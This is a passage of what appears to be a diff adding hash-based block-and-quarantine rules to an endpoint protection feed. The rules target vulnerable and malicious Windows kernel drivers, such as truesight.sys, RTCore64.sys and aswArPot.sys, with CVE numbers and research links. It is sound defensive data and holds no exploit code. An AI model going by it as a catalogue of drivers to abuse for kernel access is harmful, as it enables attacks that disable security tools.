"2026-03-23T11:45:31.472205Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472214Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ed1123884c56f51ceeff4b8436b0daca4345bea8d3be6d910d37ef36d97adc68", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8532b569-9f2d-5490-99c2-813354ca3843", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607997Z", + "creation_date": "2026-03-23T11:45:29.607999Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608004Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "606beced7746cdb684d3a44f41e48713c6bbe5bfb1486c52b5cca815e99d31b4", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85353b41-8fbe-58d1-bb94-eb918086deec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489652Z", + "creation_date": "2026-03-23T11:45:31.489655Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489663Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "981890ee9c10c9885b0e18bab66a1edc90873bc71f332df8c1569a935044bab4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85376a79-eda7-50f1-9c1a-81f7859b5d7e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826650Z", + "creation_date": "2026-03-23T11:45:31.826652Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826657Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "59af1616a5d287df7af458ea857bbff6ffa096ca3161c1576ba0a9c0a8ec6136", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8537c540-a2ea-56aa-b25d-980270622e0b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474482Z", + "creation_date": "2026-03-23T11:45:31.474486Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474496Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2810d5f117de53be7460cdf9cb842e205bc57ecd1ac0f9a75cce6bf24a7679ad", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "854406d2-c011-542d-8da2-584a3c97bea3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477696Z", + "creation_date": "2026-03-23T11:45:30.477699Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477708Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3e85cf32562a47d51827b21ab1e7f8c26c0dbd1cd86272f3cc64caae61a7e5fb", 
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "854ecd33-c255-5dd9-aab6-e3c9580d000a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825558Z", + "creation_date": "2026-03-23T11:45:30.825561Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825566Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "74bcd33f80f319470a1953ba5ff5aa472bb608060f899823714debfec67e3f55", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85536b3c-6500-58f7-81c0-ad8f3825c716", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.817329Z", + "creation_date": "2026-03-23T11:45:30.817331Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817337Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0e2a4bf10a9428888e043fa40f7af74a963ed663c6bf4e2f136e39c41f606db", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8558761d-66f6-5c6d-87fc-42eeae05a614", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969096Z", + "creation_date": "2026-03-23T11:45:29.969100Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969106Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1273b74c3c1553eaa92e844fbd51f716356cc19cf77c2c780d4899ec7738fbd1", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"855bcbfa-d741-57a5-baf9-338ad2cb8950", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621263Z", + "creation_date": "2026-03-23T11:45:29.621265Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621271Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "436ccab6f62fa2d29827916e054ade7acae485b3de1d3e5c6c62d3debf1480e7", + "comment": "ASUSTeK vulnerable physmem driver (aka AsIO64.sys) [https://www.loldrivers.io/drivers/79692987-1dd0-41a0-a560-9a0441922e5a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "856d3bc6-9c51-5de7-a640-944db2ac5a95", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823767Z", + "creation_date": "2026-03-23T11:45:31.823769Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823775Z", 
+ "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2c98d33a785d0ea8461d8ccc68e6a185ee47671bd798f027a758e6658cf67129", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85749656-42ba-593a-b771-5b6133d17ea9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483180Z", + "creation_date": "2026-03-23T11:45:31.483184Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483194Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ca18d6a7d349fce5d87c8df1cb134dc8a64ac30c52d8007959d91a9e18fb1290", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "857d144a-9ab9-5c26-b738-47b91a6c0165", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483847Z", + "creation_date": "2026-03-23T11:45:31.483851Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483861Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "04f301e64c65392488add6711527ab76955cc5835691701fa16ae080b6366eb3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8585827a-b81b-577d-8189-521286e613ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481496Z", + "creation_date": "2026-03-23T11:45:30.481499Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481508Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "9399f35b90f09b41f9eeda55c8e37f6d1cb22de6e224e54567d1f0865a718727", + "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8585c362-f637-53f1-bb5f-1849cf020c6a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979394Z", + "creation_date": "2026-03-23T11:45:29.979396Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979401Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "770f33259d6fb10f4a32d8a57d0d12953e8455c72bb7b60cb39ce505c507013a", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85911e54-9823-50fc-8d0d-62d283e1c39b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475100Z", + "creation_date": "2026-03-23T11:45:30.475103Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475113Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19e80663f055a038621c6de731151e4e8d6f42fde359efaf2ddeb49c62e317c4", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8597c034-1310-5a1e-a25b-573795d15efc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809674Z", + "creation_date": "2026-03-23T11:45:31.809677Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809685Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2647489235835128e939e3d49d6ec9369c09256e47b2c647a73a730346a3954c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85a0def7-df67-5127-a898-abc2cdc9fd66", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608422Z", + "creation_date": "2026-03-23T11:45:29.608424Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608429Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85b845e6-ef75-5bf9-aad8-d79d22262657", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151730Z", + "creation_date": "2026-03-23T11:45:31.151732Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151740Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c4021068436795b26ebf4438a76e131f1630a95fc688380eee09c86f3d4ce6c3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85b8522c-69e1-5c3b-93b1-ef3c20c621b4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615972Z", + "creation_date": "2026-03-23T11:45:29.615974Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615979Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073", + "comment": "TOSHIBA BIOs update vulnerable driver (aka NCHGBIOS2x64.SYS)", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85b9b4ad-ba4c-56ad-aca9-135620125c08", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974247Z", + "creation_date": "2026-03-23T11:45:29.974249Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974254Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "66539655171ddff02d8134241c58a53de3faa6467db7be14131e04b99ef33cee", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85c0cc41-8fab-590c-984f-dfcb0aff69c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809787Z", + "creation_date": "2026-03-23T11:45:31.809790Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809799Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"5913062e399ea3ae003c55025eceed37270932168dc514f6ca7d03c87e5b804f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85c40e2b-8884-5494-b52a-c654a7727055", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152059Z", + "creation_date": "2026-03-23T11:45:31.152062Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152070Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "20e726f48bd86327c0e438667072983195c8140c50fe325598e343b5c8337e48", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85d2ed07-85a8-591f-8beb-1b63a279f39b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977587Z", + "creation_date": "2026-03-23T11:45:29.977589Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977594Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b5606dc2a76350916cd77348cfdfe502256d759a4743dd4af503d2f7f348eb70", + "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85d8a669-85ce-5232-a004-db477c3b7d51", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144107Z", + "creation_date": "2026-03-23T11:45:31.144109Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144114Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29e4972cbcdcff16e1dfa7bf57b046ecba8db445e987e436c303755faff61c89", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
